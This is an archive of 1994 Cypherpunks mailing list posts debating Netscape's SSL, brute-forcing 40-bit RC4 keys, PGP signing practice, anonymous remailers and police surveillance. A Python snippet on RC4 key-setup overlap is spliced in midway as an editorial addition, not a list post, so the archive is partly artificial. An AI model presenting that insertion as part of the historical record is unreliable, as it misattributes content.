BATF plutonium AK-47 Kennedy colonel nuclear munitions Legion of Doom smuggle World Trade Center arrangements strategic PLO Rule Psix Ortega

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLuzxy7AuBPCxVEQ9AQGylAQAtrcF0ra1aG94Wnac3QFIVL1kmiOsNlGj
zCMDAQxXExnBf5UhGct+EkDfO20kZAr2cgYwP5CH3YdcmKJ6J2nk9dvJaujZ2Dhf
hPpug+uqnGC7R7V0ZsCcq9onpgYW+9lS4Do+EG1MIfz7j5pg541HBoBVBXOpKRXo
nPPB+9OTkLw=
=xOk1
-----END PGP SIGNATURE-----

From db at Tadpole.COM Mon Dec 12 17:09:02 1994
From: db at Tadpole.COM (Doug Barnes)
Date: Mon, 12 Dec 94 17:09:02 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412121638.ZM17746@warp.mcom.com>
Message-ID: <9412130108.AA12391@tadpole.tadpole.com>

> Doug B.:
> >
> > Ah, it doesn't work with existing proxies, so we have to pay
> > you. Whether it is your true motivation or not, this
> > apparent attempt to create a market for proprietary goods by
> > disrupting standards is at the core of the bad odor that your
> > company is giving off these days.
>

Kipp:
> You are right. It doesn't work with existing proxies. But existing proxies
> can't do secure data transfers, so what's your point?

Rather than saying, "oh, our new 'standard' won't work with existing technology, so buy ours", you might say, "we will be happy to work with the developers of existing proxies to make necessary changes to be compatible with our product. Alternatively, you could buy our proxy software which also has some additional benefits of foo, bar and baz." (Also, not every solution to every Web security threat involves breaking existing proxies.)
But no, you blindly forge ahead, so full of yourself that you blissfully reinvent wheels (Perry), miss the real concerns of the users (Me), disrupt the marketplace (Amanda), and generally fail to think things through very well (Adam) or consider the work of others (Perry).

Your three biggest problems are: arrogance, arrogance and arrogance.

Kipp:
> In any case, my personal opinion is that NCOM is being attacked with a
> catch-22. If we had kept the protocol proprietary, then we would have been
> shot. We went public with it and are getting shot. If we had waited the 2.5
> years to develop it, as a few here would seem to be advocating, then the market
> would shoot us.
>

If you were willing to _read_ and to go to an occasional meeting, or even send out a post, "Hey, I'm about to sink the resources of this company into coming up with yet another transport layer security protocol, anyone got one already?", then you might get less hostility, or you might not get used for target practice so often.

From ianf at sydney.sgi.com Mon Dec 12 17:16:20 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Mon, 12 Dec 94 17:16:20 PST
Subject: Time to exhaustively break 40-bit RC4?
In-Reply-To: <9412130031.AA11399@snark.imsi.com>
Message-ID: <9412131211.ZM13506@wiley.sydney.sgi.com>

On Dec 12, 7:31pm, Perry E. Metzger wrote:
> ...it's a question of deriding the security of any system that takes so
> little time to crack, and that's assuming there are no better attacks
> than brute force (yet to be determined). With optimization, you can do
> even better than that. With a little bit of hardware (not very much)
> you can crack open a 40 bit keyspace with the effort normally reserved
> for opening your bathroom door in the morning.

Actually, it's a bit more than a "little bit of hardware".
One of the interesting realisations of pondering VLSI crackers was how much chip real-estate storing 2048 bits of largely static internal state required, disregarding the size of a 2048 bit bus (remember "transistors are cheap, wires are expensive".) All transfers would have to be multi-cycle operations, which adds complexity due to the need to time and synchronise these transfers.

It's by no means impossible, but the design of such a device is certainly not a trivial exercise in engineering, and I would never call the result a "little piece of hardware".

Ian.

From g4frodo at cdf.toronto.edu Mon Dec 12 17:18:45 1994
From: g4frodo at cdf.toronto.edu (Richard Martin ( frodo ))
Date: Mon, 12 Dec 94 17:18:45 PST
Subject: Hal Finney & Bob Rae and Ontario's Parliament
In-Reply-To: <199412120739.CAA03309@bb.hks.net>
Message-ID: <94Dec12.201828edt.1041@marvin.cdf.toronto.edu>

-----BEGIN PGP SIGNED MESSAGE-----

In message <199412120739.CAA03309 at bb.hks.net>, "L. McCarthy" writes:
>Is this true ?

Probably not. In my reply to a query about it, I recommended the use of Viacrypt, mainly because of legal concerns, and partly because of the prospects of printed documentation (I like manuals I can burn when I'm done with them), user support, and so on. (Bluntly, I'm currently having to drop all the way out to DOS to sign things right now, and I don't think the Premier's office would be too wild about such a prospect. They're probably all Windows people, so they'll run the Windows version, if they use it at all.

Bob Rae is the premier of Ontario, not the prime minister (though in French, he would be "le premier ministre" of Ontario).

Oh. What is cypherpunks thought on having two Rae keys? Many business people have photocopied signatures (or digitized) for relatively unimportant mailings... Can a key be shared among the premier and his confidential secretary, say, with another for legal matters and a third for private communications?

>According to the PGP 2.6.1 User's Guide:
>"The freeware version of PGP is only for personal, non-commercial use -- all
>other users in the USA and Canada must obtain a fully licensed version of PGP
>from ViaCrypt. [...] If you have a need to use PGP in a commercial or
>Government setting, and ViaCrypt has a version of PGP for your hardware
>platform, you should get ViaCrypt PGP."

Mea culpa. I was thrown by the US government's free use of it (I think they get that, don't they?). On a silly note, my government is not currently making money, and could hardly be classified as being in business. ;)

frodo

- --
Richard Martin ChemPhysCompSci 9T7+PEY = 9T8      g4frodo at cdf.toronto.edu
Trinity College University of Toronto SVW92       martinrd at gpu.utcc.toronto.edu
My opinions, when not poached. (or fried)         frodo at uhura.trinity.toronto.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQCVAgUBLuz8Uq+lG3+zwTCVAQHm3wP/dKBORWta6tSxTzqFuNYbOm/ohh/d9RBe
uZ/Z1IcSOQmX2oeKvkShnca4rbNF10kPEfCgz2gMnRKwWNLtgUZ1Edvmta90CcQ2
7Iim86+xD0RwE+1M67qosUI0uNoL/50JLdoqX19zDDdZ45ddd+QTrDSAv1hm2yos
OTtytJllSBc=
=Mciz
-----END PGP SIGNATURE-----

From anonymous-remailer at xs4all.nl Mon Dec 12 17:19:58 1994
From: anonymous-remailer at xs4all.nl (Name withheld on request)
Date: Mon, 12 Dec 94 17:19:58 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412122322.AA11307@snark.imsi.com>
Message-ID: <199412130121.AA28319@xs1.xs4all.nl>

In article <9412121600.ZM17661 at warp.mcom.com>, Kipp E.B. Hickman wrote:
>> Use DNS for key distribution. Use IPSP (soon to be standardized -- SSL
>> isn't standard either) for the packet layer. Use some variant of
>> Photuris for key distribution. All the software in question is
>> publicly available or will be and will run on a wide variety of
>> platforms.
>
>Please provide a reference for "Photuris". The web crawler couldn't find it.

While you're at it please do my job for me too Perry.
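
On the RC4 key-setup question raised in the "Time to exhaustively break 40-bit RC4?" messages in this archive, the following is an added example, not code from any poster. It runs the commonly published RC4 key setup on two adjacent 40-bit keys and counts how many of the 256 setup swaps they share and how far apart the resulting tables end up; the sample keys are constructed, and the 500 keys/second rate is the figure quoted from Raph Levien's estimate.

```python
"""RC4 key setup: how much work do two adjacent 40-bit keys share?"""


def ksa_trace(key):
    """Run RC4 key setup; return (final table S, list of (i, j) swaps)."""
    S = list(range(256))
    j = 0
    swaps = []
    for i in range(256):
        # Key bytes are reused cyclically: a 5-byte key is read about 51 times.
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
        swaps.append((i, j))
    return S, swaps


def keystream(key, n):
    """First n RC4 output bytes; used here to check the key setup is right."""
    S, _ = ksa_trace(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def shared_prefix(key_a, key_b):
    """Number of leading key-setup swaps that are identical for both keys."""
    _, a = ksa_trace(key_a)
    _, b = ksa_trace(key_b)
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def differing_positions(key_a, key_b):
    """How many of the 256 table entries differ once key setup is finished."""
    Sa, _ = ksa_trace(key_a)
    Sb, _ = ksa_trace(key_b)
    return sum(1 for x, y in zip(Sa, Sb) if x != y)


def years_to_search(key_bits, keys_per_second):
    """Worst-case exhaustive search time in years (365.25-day years)."""
    return (2 ** key_bits) / keys_per_second / (365.25 * 24 * 3600)


# Constructed sample keys (not from the thread): adjacent 40-bit values.
KEY_A = bytes([0, 0, 0, 0, 0])
KEY_B = bytes([0, 0, 0, 0, 1])  # differs only in the last key byte
KEY_C = bytes([1, 0, 0, 0, 0])  # differs only in the first key byte

if __name__ == "__main__":
    # The differing byte is first read at step i = 4 (or i = 0 for KEY_C);
    # from that step on, the running index j differs, so every later swap
    # has to be recomputed.
    print("swaps shared, last byte differs: ", shared_prefix(KEY_A, KEY_B))
    print("swaps shared, first byte differs:", shared_prefix(KEY_A, KEY_C))
    print("table entries that differ after setup:",
          differing_positions(KEY_A, KEY_B), "of 256")
    print("years at 500 keys/s for 40 bits: %.1f" % years_to_search(40, 500))
```

With a 5-byte key, at most the first four swaps can be reused between adjacent keys, which is the effect of the key reuse during setup that the replies from Eric Hughes and Hal describe.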

From warlord at MIT.EDU Mon Dec 12 17:27:46 1994
From: warlord at MIT.EDU (Derek Atkins)
Date: Mon, 12 Dec 94 17:27:46 PST
Subject: extra dashes in PGP-related blocks?
In-Reply-To: <9412130059.AA07996@nottingham.riskdev.ml.com>
Message-ID: <9412130127.AA17596@hodge-podge.MIT.EDU>

-----BEGIN PGP SIGNED MESSAGE-----

To: andrew at riskdev.ml.com (Andrew Brown)
cc: jrochkin at cs.oberlin.edu (Jonathan Rochkind), cypherpunks at toad.com
Subject: Re: extra dashes in PGP-related blocks?

> but wait! you can't actually verify the outer sig until you extract
> the key from inside the signed message? that's a bit more
> complicated. pgp will actually recognize a key embedded inside an
> armored, signed message but it won't (i don't think -- warlord?) play
> with the key other than tell you it is one.

Actually, PGP won't even do that. If the key is not in your keyring, it will complain about not finding it and output the de-armored message. If you want to add the key, you need to run it through PGP once to de-armor it, save off the output, and then add that output message to your keyring.

> what these people should probably be doing is signing their public
> keys with their private keys to provide the same functionality
> (almost). what you have, otherwise, really is a two step process.
> you will have to strip off the outer sig layer to get the key.

This is exactly what people should do. People should _never_ clearsign a public key block. If you want to sign it, sign the key inside the keyblock. When someone clearsigns a keyblock, they are making two passes over it to create it, which requires you to make two passes to read it in!

- -derek

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBuAwUBLuz4Lzh0K1zBsGrxAQGSTgLDBtb7BWTSXbk5s8taH+2V8/MHpz/1BYIi
AesXunQmFmJ+WXGNHbkfDK5CF2VzwiYyBaDxTkY90PwEV7cUAoNg3yCI8QJbsGX/
ZkO1kxTih46a1LucIe6U4EE=
=Ov0C
-----END PGP SIGNATURE-----

From cactus at seabsd.hks.net Mon Dec 12 17:31:03 1994
From: cactus at seabsd.hks.net (L.
Todd Masco)
Date: Mon, 12 Dec 94 17:31:03 PST
Subject: alt.anonymous.messages propagation
Message-ID: <199412130135.UAA25636@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

(Replied to this once privately, but since mail continues to come in I'll repeat here)

In article <9412122127.AA17019 at hodge-podge.MIT.EDU>, Derek Atkins wrote:
>> Nope, no alt.anonymous. 'Leastaways, not off the servers that the turist
>> accounts use. And since I configured news on the machine, I'd love to
>> hear if there are MIT servers that have a larger set than life.ai's.
>
>I just looked on news.mit.edu and bloom-beacon.mit.edu (the MIT
>news-transport machine), and I found both alt.anonymous and
>alt.anonymous.messages, so I don't think saying "MIT doesn't get
>alt.anonymous" is at all correct.
>
>It may be correct to say that "GNU.AI.MIT.EDU doesn't get
>alt.anonymous", but GNU is _NOT_ MIT!

Yup, that's why I qualified my statement. Can't check on servers I don't know about, after all. FTR, it's not GNU that I'm on/help maintain. It's bronze.

So, life.ai.mit.edu is a deficient newsserver and I'll switch the default on bronze to news.mit.edu after appropriate consultations.

- --
Todd Masco         | It's difficult to be loud about keeping your enumerated
cactus at hks.net  | rights when you're busy exercising your unenumerated ones.
cactus at bb.com   | http://www.hks.net/~cactus/cactus.html

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLuz6VCoZzwIn1bdtAQG1/wF7BAGUuLjGM1JVjpYxP1e6eUYNRSUPrvbX
/alvpNH0g8mVFKaSPf8EH1nEeiV4K4Pf
=MsKC
-----END PGP SIGNATURE-----

From kipp at warp.mcom.com Mon Dec 12 17:39:30 1994
From: kipp at warp.mcom.com (Kipp E.B.
Hickman)
Date: Mon, 12 Dec 94 17:39:30 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412130108.AA12391@tadpole.tadpole.com>
Message-ID: <9412121737.ZM17867@warp.mcom.com>

On Dec 12, 6:26pm, Doug Barnes wrote:
> Subject: Re: Clarification of my remarks about Netscape
> > Doug B.:
> > >
> > > Ah, it doesn't work with existing proxies, so we have to pay
> > > you. Whether it is your true motivation or not, this
> > > apparent attempt to create a market for proprietary goods by
> > > disrupting standards is at the core of the bad odor that your
> > > company is giving off these days.
> >
>
> Kipp:
> > You are right. It doesn't work with existing proxies. But existing proxies
> > can't do secure data transfers, so what's your point?
>
> Rather than saying, "oh, our new 'standard' won't work with
> existing technology, so buy ours", you might say, "we will be
> happy to work with the developers of existing proxies to make
> necessary changes to be compatible with our product. Alternatively,
> you could buy our proxy software which also has some additional
> benefits of foo, bar and baz." (Also, not every solution to
> every Web security threat involves breaking existing proxies.)

If this hadn't been made clear already, then hopefully this will:

Our intention is to support any development effort attempting to implement an SSL conformant implementation. We will work with you to repair the spec as needed to eliminate any errors or omissions, and help you test your implementation to ensure that it interoperates with ours.

> But no, you blindly forge ahead, so full of yourself that you
> blissfully reinvent wheels (Perry), miss the real concerns of
> the users (Me), disrupt the marketplace (Amanda), and generally
> fail to think things through very well (Adam) or consider the work
> of others (Perry).
>
> Your three biggest problems are: arrogance, arrogance and
> arrogance.

I'm really sorry that this is how we are currently being perceived.
It was never our intention. Rather, we wished to do those things that we believed were necessary to allow commerce on the Internet. We are a small company with limited resources and limited time to market. After talking with prospective customers we came up with a plan and implemented it. We are sorry if somebody's toes were stepped on in the process.

> Kipp:
> > In any case, my personal opinion is that NCOM is being attacked with a
> > catch-22. If we had kept the protocol proprietary, then we would have been
> > shot. We went public with it and are getting shot. If we had waited the 2.5
> > years to develop it, as a few here would seem to be advocating, then the market
> > would shoot us.
> >
>
> If you were willing to _read_ and to go to an occasional
> meeting, or even send out a post, "Hey, I'm about to sink
> the resources of this company into coming up with yet another
> transport layer security protocol, anyone got one already?",
> then you might get less hostility, or you might not get used
> for target practice so often.

We believe that we were up to date with respect to what was going on in the internet community at large when the company was started. Somebody should feel relieved that approach matches where the internet seems to be heading - security at the transport levels. Our imperfect examination of the work in progress yielded nothing that would meet our needs and our timeliness. I'm sorry if our selection criteria don't meet yours.

In any case, the cat is out of the bag, and we are where we are.

--
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com            http://www.mcom.com/people/kipp/index.html

From tcmay at netcom.com Mon Dec 12 17:44:10 1994
From: tcmay at netcom.com (Timothy C.
May)
Date: Mon, 12 Dec 94 17:44:10 PST
Subject: A Golden Opportunity
Message-ID: <199412130143.RAA11607@netcom4.netcom.com>

Cypherpunks,

It seems to me that we have a golden opportunity to apply our crypto know-how, and our special perspective, to truly important issues.

In recent days we have seen on our own list comments from folks from Netscape--surely a major player in whatever's coming--and from attendees at the recent IETF meeting (that stuff is Acronym City to me, so I stay out of the debate). And contributions from Phil Zimmermann, Bruce Schneier, Steven Levy, and the like.

"Can't we all just get along?" is a much-laughed-at slogan, but it seems to apply here. We have a golden opportunity to influence the Net of the future, surely a good thing. (And I haven't even mentioned the Cypherpunks connections to digital cash of various flavors.)

I understand that this list is no substitute for things like the recently-occurring IETF conference (or whatever it was), but it seems unproductive to be arguing here. (Argument can be good, of course. Amanda Walker _started_ the argument, but the resulting debate has been illuminating, so I think the outcome of the argument has been generally good.)

I suppose what I'm suggesting is that we treat the confluence of influential people here as a good opportunity to debate the future. We probably can't debate fine points in great detail--the list just can't support the passing of detailed specs back and forth--but I think many of us are willing to put up with some acronyms in exchange for you putting up with our non-IETF comments (:-}).

The future Net is now being architected. What better time for Cypherpunks to apply their various views?

--Tim May

--
..........................................................................
Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From eric at remailer.net Mon Dec 12 17:45:34 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 17:45:34 PST Subject: Time to exhaustively break 40-bit RC4? In-Reply-To: <9412131131.ZM13269@wiley.sydney.sgi.com> Message-ID: <199412130242.SAA00825@largo.remailer.net> From: "Ian Farquhar" No, because as you're doing an exhaustive keysearch, you can "pipeline" the key generation process in software. Each key requires 256 swaps, certainly, but there are only two swaps difference between the key for "0000000000" and "0000000001" (assuming a 40 bit key). Not by my count. The key data length for a forty bit key is only 5. That means that each byte of the key data is used about fifty times in key setup (256/5). Those initial changes in the internal key permutation table then propagate under iteration. Now I haven't looked very closely at how to optimize this search, and it's not even clear that it's possible. There are 256! possible permutations for the internal key, which is a lot more than 2^40 possible (external) keys. It's quite possible that the internal keys are just not particularly close to each other. Close here, say, is the minimum number of swaps needed to take one key to another. It's possible that some arrangement other than incrementing the key yields internal key correlations that speed up software internal key generation. Eric From hfinney at shell.portal.com Mon Dec 12 17:57:11 1994 From: hfinney at shell.portal.com (Hal) Date: Mon, 12 Dec 94 17:57:11 PST Subject: Time to exhaustively break 40-bit RC4? 
In-Reply-To: <199412122330.PAA29185@netcom20.netcom.com> Message-ID: <199412130156.RAA11086@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- "Ian Farquhar" writes: >No, because as you're doing an exhaustive keysearch, you can "pipeline" >the key generation process in software. Each key requires 256 swaps, >certainly, but there are only two swaps difference between the key >for "0000000000" and "0000000001" (assuming a 40 bit key). If you >recursively generate keys, then you can generate successive keys >like this: This is not true, for a few reasons. First, keys are replicated (reused over and over) until 256*8=2048 bits have been used. So a 40-bit key would get reused about 50 times. Second, the key feeds into a PRNG which is mixed in with the swapping, so once you swap with a different one you will swap differently from then on. And third (and this is the one I find most interesting), SSL does not just use a 40-bit key for the export versions. They use a 128-bit key, but they require 128-40=88 bits to be sent in the clear. So the potential keyspace is much bigger than 2^40. This will make certain attacks (primarily those involving pre-calculation, which actually doesn't apply to your pipeline I guess) impossible. I thought it was interesting that this "128 minus 88" bit key qualified for the export approval. This suggests that NSA has no better attack than brute force (nothing relying on cryptographic weaknesses of 40 bit keys, for example). Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLuz/VBnMLJtOy9MBAQFMQwIAgo6XwroajnfYmRzSasstBSTKFGVeGI5U Kbg4VBG9FU9qFJaZ6hDpFbfZhvSc8OPnK0COWuZsdEZDcl1QDuwELA== =JCls -----END PGP SIGNATURE----- From raph at netcom.com Mon Dec 12 17:57:45 1994 From: raph at netcom.com (Raph Levien) Date: Mon, 12 Dec 94 17:57:45 PST Subject: Time to exhaustively break 40-bit RC4? 
In-Reply-To: <9412131131.ZM13269@wiley.sydney.sgi.com> Message-ID: <199412130151.RAA26048@netcom20.netcom.com> Ian Farquhar wrote: > No, because as you're doing an exhaustive keysearch, you can "pipeline" > the key generation process in software. Each key requires 256 swaps, > certainly, but there are only two swaps difference between the key > for "0000000000" and "0000000001" (assuming a 40 bit key). If you > recursively generate keys, then you can generate successive keys > like this: This doesn't quite work. As I understand it, the RC4 key scheduling algorithm repeats the key to fill 256 bytes. For a 128-bit key, this is 16 times. Thus, you can only win on the last repeat. Perry also mentioned some "optimizations" but I believe RC4 is resistant to this sort of thing. The inner loop is about as simple as you're going to get it. Oh, just to clarify one point. 40-bit RC4 in fact uses a 128 bit key, it's just that 88 bits of the key are sent in the clear. Your idea does help in searching the 128-bit keyspace. Unfortunately, it reduces the time needed from about 10^45 to 10^43 operations. Mazel Tov. Raph From Tony.Gurnick at nzdairy.co.nz Mon Dec 12 17:58:41 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Mon, 12 Dec 94 17:58:41 PST Subject: Anonymous Repository Message-ID: <94121314474992@nzdairy.co.nz> To solve anonymous replies, here's a little scenario. Alice wants something from Bob (crypto?) but doesn't want Bob to know (or any others (NSA?)) to know. 1) Alice sends a request to Bob via an anon-remailer chain. 2) In the request she specifies that Bob is to put a special code in the message and send it to anon-repostiory at nowhere.com 3) Bob sends the info + the special code, for whatever reason. (Payment received?) 
4) Alice sends a message to anon-repostiory at nowhere.com saying to copy Bob's message (using special code) to a new secret special code (here code represents a file name) - This message could/should be encrypted and the repository should delete it after the copy is made. 5) At some undetermined time in the future Alice ftp's or sends a mail message to anon-repostiory at nowhere.com and retrieves Bob's message. This should defeat traffic analysis but will do nothing if the repository is compromised! But the same goes for anon-remailers. There are huge blanks in this, so does anyone want to comment? T From eric at remailer.net Mon Dec 12 18:04:14 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:04:14 PST Subject: IPSP and Netscape In-Reply-To: <9412121508.ZM17611@warp.mcom.com> Message-ID: <199412130302.TAA00871@largo.remailer.net> I've tried really hard to stay out of this, but this one is just too much. The question is about IPSP, the swIPe-like IP level security protocol. From: "Kipp E.B. Hickman" Name one router that speaks the secure protocols you are documenting? Name one PPP based bridge that does? Show me, today, what percentage of the Internet is covered by these standards? [ ... later ... ] My company's network hardware is typical. It is filled with expensive devices that don't understand IPSP or IPNG. In fact, most of the world is constructed this way. The protocol does IP-within-IP encapsulation, which means that every single router deployed is able to carry the secured traffic. Now, this is not so egregious an error by itself (it is, but I'm being polite), but coupled with the claims that SSL is better than anything else out there, I see an argument from chauvinism rather than one from knowledge. Since IPSP works at the IP level rather than at the TCP level there are protocol stacks that have to change. This is not immediate. 
It may be that IPSP is not the quickest or best way to link security, but that is not the point I am making here. The original denial of IPSP's potential utility was made in complete ignorance, ignorance so great to lack even the most basic understanding of the subject at hand. I cannot trust abbreviated arguments from such a source. I can, however, examine ones which are complete and well thought out and demonstrate some understanding of tradeoffs. Eric From perry at imsi.com Mon Dec 12 18:09:08 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 12 Dec 94 18:09:08 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121638.ZM17746@warp.mcom.com> Message-ID: <9412130208.AA11526@snark.imsi.com> "Kipp E.B. Hickman" says: > In any case, my personal opinion is that NCOM is being attacked with > a catch-22. If we had kept the protocol proprietary, then we would > have been shot. We went public with it and are getting shot. If we > had waited the 2.5 years to develop it, as a few here would seem to > be advocating, then the market would shoot us. This is a false dichotomy -- there are far more possibilities than that. I pillory you not for being non-public but for being non-intelligent. You could have bothered to read the literature and designed something useful given an understanding of what came before (your naive notion that somehow IPSP might require router modifications would have been dispelled had you bothered to spend the half hour needed to read and understand the proposals) or you could have gone to the IETF and gotten everything done very fast if you'd bothered to use the system right. As it stands you come off looking like ignorant blunderers. 
.pm From eric at remailer.net Mon Dec 12 18:11:05 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:11:05 PST Subject: public key algorithms and Netscape Message-ID: <199412130308.TAA00892@largo.remailer.net> The claim was made here by someone at Netscape that no suitable public key algorithms existed other than RSADSI technology. I don't remember how explicit this claim was; it may have been an implication of some more general statement. I note that the folks at Netscape must never have heard of elliptic curve algorithms for public key technology. I would hazard that representatives at RSADSI stated or implied that such technology was covered by their patents. I would then ask if they said so in writing. Making claims about a patent that are knowingly false is grounds for vacating the patent. The IEEE P1363 working group on cryptography standards is moving forward with elliptic curve cryptosystems but not with RSA because of patent issues. Coincidence? Eric From sandfort at crl.com Mon Dec 12 18:14:52 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 12 Dec 94 18:14:52 PST Subject: THROUGH THE LOOKING GLASS Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Tim May wrote: ... I don't want to see my local cops have all of their actions videotaped and reviewed for quite another reason--I don't want a "mechanization" of the enforcement process! Won't happen. First, cops are already required to enforce some stupid laws; the mechanism used is "quotas." Second, the vast number of laws makes total enforcement impossible. Third, the cops aren't pulling a fast one when they use their discretion to cut someone loose. I've even seen them do it on the TV show "COPS." That discretion is clearly within their powers. It's the "let's-whack-the-hippie" sort of discretion that is denied them. ... 
I have some good opinions of the California Highway Patrol ... even a cop-disliking skeptic like me can be convinced that some good is done by them, and that not all cops are bad.... I agree; and Mussolini did make the trains run on time . . . My proposal is not anti-cop; it's anti- *bad* cop. Good cops *benefit* from protective surveillance; and *all* cops benefit from having their exact location known when the feces impacts the turbine. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From sandfort at crl.com Mon Dec 12 18:15:08 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 12 Dec 94 18:15:08 PST Subject: OFF LINE Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, I am moving back to California. I fly out tomorrow evening. I will be off-line for a day or two at least. Go ahead and send me stuff; I'll get to it as soon as I can. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From eric at remailer.net Mon Dec 12 18:20:15 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:20:15 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121737.ZM17867@warp.mcom.com> Message-ID: <199412130318.TAA00912@largo.remailer.net> From: "Kipp E.B. Hickman" If this hadn't been made clear already, then hopefully this will: Our intention is to support any development effort attempting to implement an SSL conformant implementation. We will work with you to repair the spec as needed to eliminate any errors or omissions, and help you test your implementation to ensure that it interoperates with ours. It's clear to me. "We're going to use some security, as long as it's called SSL and our authorship is on the document." 
Eric From eric at remailer.net Mon Dec 12 18:21:06 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:21:06 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <199412130121.AA28319@xs1.xs4all.nl> Message-ID: <199412130319.TAA00915@largo.remailer.net> Kipp E.B. Hickman wrote: Please provide a reference for "Photuris". Ah, the hazards of not going to IETF... Eric From eric at remailer.net Mon Dec 12 18:37:39 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:37:39 PST Subject: [cpunks] Re: public accounts / PGP / passphrases In-Reply-To: <199412120712.CAA01736@sparcserver.mc.ab.com> Message-ID: <199412130335.TAA00953@largo.remailer.net> From: tim werner But I agree that the idea of buying a laptop so you can use PGP at work is odious. There must be a better way. But remember, the computer you normally use at work is the property of your employer, and they are Free to Deny You Privacy with it at work. It remains to be seen where the chips will fall with respect to workplace privacy generally. Perhaps workplace email is a good argument for wireless. Eric From eric at remailer.net Mon Dec 12 18:49:11 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:49:11 PST Subject: BofA+Netscape In-Reply-To: <199412120131.RAA14755@netcom10.netcom.com> Message-ID: <199412130347.TAA00969@largo.remailer.net> How many times will there remain the confusion between what is achievably optimal and what is permitted? From: jamesd at netcom.com (James A. Donald) Now plainly they should listen very carefully to what the guys at CERN say about SGML tags, but as far as I can see, the groups that you want them to take consensus with, have no standing in this matter. This is all very Libertarianly Correct, certainly, but it may also be downright stupid. If one WWW company manages to fragment the web, the total value available to all drops, and it may also be that individual value is also less. 
Communications technologies have use-value superlinear in the number of people using compatible systems, so fragmentation always reduces total value. Whether the individual fragmented value is greater or larger than an individual non-fragmented value I cannot say. I do know that free software has this tendency to be easily replaceable. Eric From pstemari at fsp.fsp.com Mon Dec 12 18:51:39 1994 From: pstemari at fsp.fsp.com (Paul Ste. Marie) Date: Mon, 12 Dec 94 18:51:39 PST Subject: real time surveillances In-Reply-To: Message-ID: <9412130250.AA16328@fsp.fsp.com> > The developers of the localizer technology I mentioned in my > article have anticipated you. Their equipment can do real-time > vital sign monitoring. There are some obvious benefits for wired > cops plus some subtle drawbacks for bad cops. (I leave discovery > of said drawbacks as an exercise for the student.) Heh. You mean, I assume, that such a device would, when worn by an officer in court, essentially become a broadcast polygraph? It would also provide an interesting check in wrongful force cases as to whether a cop really was in fear of his life at a given time. From eric at remailer.net Mon Dec 12 18:55:26 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:55:26 PST Subject: Broadcasts and the Rendezvous Problem In-Reply-To: <199412112248.RAA25113@bb.hks.net> Message-ID: <199412130353.TAA00981@largo.remailer.net> From: "L. Todd Masco" That's not a very good approach: a human has to add a new remailer into the "net" by adding it to the systems polled. Not only is the human intervention a Bad Thing, but having a central registry of remailers is bad infrastructure. A more "web-of-trust"-like mechanism is desirable. In terms of autopinging, certainly human intervention is not desirable. This begs one question though, namely, "how does one gain trust in a remailer?". Certainly likelihood of service can be automated, but other forms of trust cannot. 
